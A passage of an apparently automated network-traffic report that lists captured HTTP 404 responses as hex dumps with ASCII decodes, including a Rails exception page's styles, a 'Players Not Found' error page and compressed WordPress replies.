61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 431f0c0c-0669-4d9d-b651-95d48a5a0839x-runtime: 0.033628content-length: 18221connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: fb8f3bc5-976b-429d-b4db-f4281f33cc3cx-runtime: 0.029723content-length: 19233connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:15 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:17 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:20 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:22 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"Server: Nginx_Rc-CrContent-Encoding: brData Raw: 32 32 31 64 0d 0a 15 74 9b 8c 44 58 93 7a 00 34 42 87 cf 79 ff ef 4f fd fe bf ed 9f af 1d 65 c5 86 1c 49 48 14 17 1c 98 92 c9 b9 37 33 3d e5 b5 38 2b 4b 80 b0 49 30 62 21 11 3b 97 e1 95 d2 cf 9d d7 eb b4 eb f3 f7 e7 bf 7c 53 75 09 28 86 ce e3 ca ae 3c 2e ca 90 62 95 73 49 be b0 ab f9 7b ff 6e e6 0e 07 78 70 80 c2 01 20 3d a0 22 c0 30 cc 6f c3 df 7f 09 14 00 52 12 08 2a 80 54 0c b1 73 d5 84 dc b9 2c cf 19 56 c5 d6 ae b4 0c 73 d9 d3 f9 6d ea dd 95 27 84 10 42 08 2d 6c 6e c3 d9 31 b1 fe 3b 85 84 01 0d 12 99 3c 86 fb fe fa 57 18 db 70 41 89 c8 de 85 28 01 26 2e d9 7b bc 2b 72 b8 bc 80 39 dc c7 40 45 20 da 9a 11 92 15 b9 bd 06 34 56 c8 39 60 93 10 98 37 05 2a 45 1e 35 8a e1 7c 33 0b e6 07 35 fb 50 cd 46 ac 95 91 88 42 25 18 b9 bc b0 ef 59 a7 c3 38 89 10 f0 0e ba 15 87 95 c0 9c 9d b3 92 42 4b 36 10 21 26 b7 cb 84 09 e8 b3 28 8f ac 36 f5 8a 37 af c6 2e af 1c ce 63 0e 16 d5 8a fc ae cb 2a 4f b2 a9 64 29 43 90 a5 26 ed 36 65 53 a7 a7 ce 20 9c e1 e1 e0 6c 55 98 e6 f8 b4 00 c8 71 d9 ee fe 67 68 56 a1 ea cc 03 11 38 6a fe af 39 cb 24 f3 0f b7 4c 1c 3c 7e d4 63 bb b7 ad 4c a5 c2 af 48 77 58 de 59 27 9d a4 43 9e 01 fe 5c 01 95 32 c0 8f 09 08 87 bf 02 e7 0b f8 e8 e2 ea d3 8b 8f e1 f3 1f fe ec f5 e5 f9 f5 b2 72 f6 20 9e 19 57 e6 69 7a 7c 7e ca d8 78 23 76 4b 9a f4 91 9a 69 4d c8 b6 b3 8d 81 95 c1 fb 84 5a 35 06 45 2f a0 25 4d 9a 22 36 ae 62 a8 3c 24 2c 8e 8c 38 96 25 ca 11 68 28 4a a1 3e ce 2a 9d f6 4a b9 34 e9 7a 5c 12 ed c6 85 40 18 65 8a ba 52 ae 2a a3 a9 dc db a1 a8 8b 8f 0e 50 f5 33 a9 d4 6b e9 54 43 07 4d 53 90 e4 17 82 d7 52 66 6c d3 5e 5f 40 9c ec 6e 0e 42 81 1b e7 2d a1 71 51 12 c7 42 8a 58 8a d1 b8 a0 91 3b e3 9c ff 36 8c e2 a1 e8 7a 6a 0f db 5a 6e d4 63 71 2d 8d 29 aa 95 86 08 3a 24 eb 86 6f 9b 52 c3 58 57 87 4b 67 e9 68 ba ad 6a c5 e5 a9 54 e5 a5 23 ee 2b 4b 07 c0 4b 58 3a dc a7 8c b2 a5 33 75 77 53 77 e9 20 8c e4 ce a0 10 c9 d9 eb 01 c2 48 3f af 60 d6 f4 f3 ea 75 54 3f af 2e 3e 0e d4 cf 6f 54 6d 93 ca f5 3a 94 aa 2a 15 26 2a a7 81 2f 6e 3a 1d bf 74 b6 35 91 fd 23 4b e7 51 3b 62 dc 94 34 22 29 55 7a 1e ff 59 36 d1 84 7a d4 47 7d bf 18 3a a7 47 cb 75 80 00 1a 81 42 c3 99 6c 29 d1 0e d6 94 19 9c 3a c3 23 29 31 54 e0 aa 91 5b 4d 61 8d e5 c2 ef f5 90 5a b2 66 9a 17 ff 61 13 75 4d c2 66 37 52 1b 1d 4a ac 40 94 c2 66 9a 1f 74 e2 4b 6f e5 67 b9 65 f7 0b 2d b5 2e 54 75 6d 54 23 56 92 6a 69 2e 8d dc 58 0a 37 dd 05 da dc ae 5a e4 2f 96 b1 6d 2d f8 04 69 77 7d 8f 42 4f 5d c6 06 bd 8a a4 cd d6 33 b8 92 a9 b1 18 66 58 d2 54 54 cf 42 d3 ea ad 9d 78 c1 b4 67 60 63 49 f3 a2 2c 6f e4 ce 58 06 33 cc f4 92 b2 89 30 7d f8 db a2 32 9e fb 5e d3 88 17 Data Ascii: 221dtDXz4ByO
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"Server: Nginx_Rc-CrContent-Encoding: brData Raw: 32 32 31 64 0d 0a 15 74 9b 8c 44 58 93 7a 00 34 42 87 cf 79 ff ef 4f fd fe bf ed 9f af 1d 65 c5 86 1c 49 48 14 17 1c 98 92 c9 b9 37 33 3d e5 b5 38 2b 4b 80 b0 49 30 62 21 11 3b 97 e1 95 d2 cf 9d d7 eb b4 eb f3 f7 e7 bf 7c 53 75 09 28 86 ce e3 ca ae 3c 2e ca 90 62 95 73 49 be b0 ab f9 7b ff 6e e6 0e 07 78 70 80 c2 01 20 3d a0 22 c0 30 